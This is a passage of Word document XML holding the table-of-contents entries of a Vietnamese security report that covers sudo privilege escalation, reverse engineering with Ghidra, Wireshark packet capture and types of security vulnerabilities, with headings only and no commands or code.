        <w:p w14:paraId="0ABCC9B9" w14:textId="7EBE8718"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31" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.1. Khái niệm</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31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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07937D3A" w14:textId="720B82C6"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32" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.2. Các loại leo thang đặc quyền</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32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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4037C455" w14:textId="2CEFC66B"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33" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3. Cơ sở lý thuyết: Sudo - Superuser Do root privilege task</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33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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3673B570" w14:textId="323C3255"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34" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.1. Root User</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34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8</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10046B3F" w14:textId="5692E9BD"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35" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.2.Phân biệt Su và Sudo</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35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9</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="14931666" w14:textId="65D352D4"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36" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.3. Privilege Escalation using Sudo Rights</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36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9</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69CEF79B" w14:textId="768A9AA4" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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37" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.3.1. Khi đặc quyền root được gán cho Binary commands</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37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9</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43FDEA1F" w14:textId="678A81FB" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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38" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.3.2. Khi đặc quyền root được gán cho Binary Programs</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38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9</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F0B87EA" w14:textId="75348273" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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39" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.3.3. Khi đặc quyền root được gán cho Shell Script</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39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10</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="786A2858" w14:textId="7DEC2175" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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40" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.2.3.3.4. Khi đặc quyền root được gán cho một số chương trình khác</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40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11</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B9AC06A" w14:textId="713814CF" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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41" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.3. Dịch ngược chương trình</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41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11</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AD47382" w14:textId="26133895"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42" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.3.1. Giới thiệu về GHidra</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42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11</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63600343" w14:textId="320E4453"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43" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.3.2. Cách sử dụng GHidra</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43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12</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="756A14A7" w14:textId="70508B8E" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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44" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4. Bắt gói tin</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44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14</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01A7396B" w14:textId="1222C0E8"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45" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.1. Giới thiệu về Wireshark</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45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14</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07525CF8" w14:textId="7845D1A1"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46" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.2. Mục đích sử dụng của Wireshark</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46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15</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DC5582E" w14:textId="37CFCEB5"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47" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.3. Tính năng của Wireshark</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47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15</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="16D4C9FF" w14:textId="030F7FE2"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48" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.4. Cách chụp gói tin bằng Wireshark</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48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16</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C55FF72" w14:textId="21A23EA8"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49" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.5. Hướng dẫn cách Color Coding trong Wireshark</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49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18</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A35A104" w14:textId="1E36EFDA"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50" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.6. Cách mở và sao lưu gói tin trong Wireshark</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50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19</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="466EDFCF" w14:textId="19250428"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51" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.7. Cách lọc gói tin trong Wireshark</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51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0</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="268CDB5F" w14:textId="2F353CC3"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52" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.4.8. Cách kiểm tra gói tin trong Wireshark</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52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1</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04C896D2" w14:textId="1ACEA95C" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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53" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5. Khai thác lỗ hổng bảo mật</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53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2</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1E4E9875" w14:textId="332D2E08"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54" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1. Khái niệm</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54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2</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="483B93C0" w14:textId="346A3C2B"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55" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.1. Lỗ hổng bảo mật là gì?</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55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2</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="309FFF06" w14:textId="7CE875E4"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56" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.2. Nguyên nhân gây ra lỗ hổng bảo mật</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56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2</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05074D98" w14:textId="7F235E2C"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57" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3. Các loại lỗ hổng bảo mật</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57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2</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04386D7B" w14:textId="5E95BA2E" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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58" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.1. Phần mềm chưa được vá</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58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2</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03CCB013" w14:textId="2691F773" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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59" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.2. Thông tin đăng nhập yếu</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59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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E8B78B4" w14:textId="6B71F594" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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60" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.3. Phishing, Web &amp; Ransomware</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60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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27A28D40" w14:textId="5396FE71" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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61" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.4. Trust Relationship</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61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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22118D65" w14:textId="70699D4C" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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62" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.5. Thông tin đăng nhập bị xâm phạm</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62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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="166A1790" w14:textId="7E97E6A7" w:rsidR="00640CC0" w:rsidRPr="00640CC0" w:rsidRDefault="00E27A27">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63" w:history="1">
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>2.5.1.3.6. Nội gián độc hại</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63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3</w:t>
            </w:r>
            <w:r w:rsidR="00640CC0" w:rsidRPr="00640CC0">
